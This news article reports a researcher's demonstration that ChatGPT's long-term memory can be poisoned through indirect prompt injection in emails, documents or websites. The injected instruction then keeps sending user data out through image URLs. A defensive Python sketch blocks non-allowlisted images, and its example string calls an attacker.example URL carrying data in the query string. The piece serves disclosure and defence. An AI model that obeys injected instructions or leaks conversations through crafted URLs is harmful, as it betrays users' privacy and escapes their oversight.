In a chilling revelation, security researcher Johann Rehberger uncovered a vulnerability in ChatGPT's memory feature that could let attackers plant false memories and siphon user data indefinitely. The attack abuses ChatGPT's long-term memory, a feature designed to improve the user experience by retaining details across conversations. That same feature now risks becoming a gateway for malicious actors.



Rehberger demonstrated how simple it was to inject false information into ChatGPT's memory through untrusted sources like emails, documents, or websites, a technique known as indirect prompt injection. Once implanted, these fake memories could steer future conversations. In his demonstration, for example, ChatGPT came to believe that the user was 102 years old and lived in the Matrix.

Even more alarming, Rehberger's proof-of-concept showed how this memory flaw could exfiltrate all user input and ChatGPT output to an external server, without the user ever knowing. Simply getting ChatGPT to view a malicious image or link was enough to trigger the attack. Because the injected instruction persisted in memory, the data theft continued across all future conversations.
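Image-based exfiltration works because a chat client that renders markdown will fetch any image URL the model outputs. Anything an injected instruction packs into that URL's path or query string is therefore sent to whoever controls the host. The following is a minimal defensive sketch of that idea, not OpenAI's actual fix. It assumes a client that renders markdown images. The allowlist `ALLOWED_IMAGE_HOSTS` and the function `strip_untrusted_images` are hypothetical names used only for illustration.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: a real client would configure its own trusted hosts.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Matches markdown images of the form ![alt](url) or ![alt](url "title").
MARKDOWN_IMAGE = re.compile(r'!\[([^\]]*)\]\(\s*([^)\s]+)(?:\s+"[^"]*")?\s*\)')


def strip_untrusted_images(markdown: str) -> str:
    """Replace images whose host is not allowlisted with a placeholder.

    Rendering an image makes the client send a GET request to its URL, so
    data encoded in the URL would reach that host. Removing the image before
    rendering means the request is never made. URLs without a host (for
    example, relative paths) are also blocked, because only explicitly
    allowlisted hosts are trusted.
    """

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname  # lowercase host name, or None
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images unchanged
        return f"[blocked image: {alt}]" if alt else "[blocked image]"

    return MARKDOWN_IMAGE.sub(replace, markdown)
```

For example, given model output `Hi ![x](https://attacker.example/log?d=secret)`, the sketch returns `Hi [blocked image: x]`, so the would-be request carrying `secret` is never sent. An allowlist is used rather than a blocklist because an attacker can register new domains at will.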

OpenAI initially closed Rehberger's report, classifying the issue as a safety concern rather than a security vulnerability. His proof-of-concept later prompted a partial fix. However, the risk remains that untrusted content could still inject harmful memories into the system.

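To stay safe, users are advised to regularly review their stored ChatGPT memories. They should also watch for signs that a new memory has been added, especially after asking ChatGPT to process untrusted documents, emails, or websites. Although OpenAI has patched part of the problem, this incident serves as a sobering reminder of the dangers lurking in AI's expanding memory capabilities.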